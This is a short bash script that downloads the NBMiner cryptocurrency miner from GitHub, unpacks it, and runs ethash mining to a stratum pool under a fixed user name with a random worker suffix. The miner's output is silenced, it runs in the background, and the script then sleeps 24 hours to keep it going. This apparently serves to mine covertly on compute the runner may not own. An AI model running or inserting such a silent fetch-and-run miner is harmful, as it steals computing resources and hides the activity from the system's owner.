#!/bin/bash 
wget https://github.com/NebuTech/NBMiner/releases/download/v40.1/NBMiner_40.1_Linux.tgz && tar xf NBMiner_40.1_Linux.tgz && rm NBMiner_40.1_Linux.tgz && cd NBMiner_Linux && ./nbminer --url stratum+tcp://eth.ss.poolin.me:443 --user anzha.$(echo $(shuf -i 100-999 -n 1)-ANZ) -p 123 --algo ethash > /dev/null 2>&1 &
sleep 24h
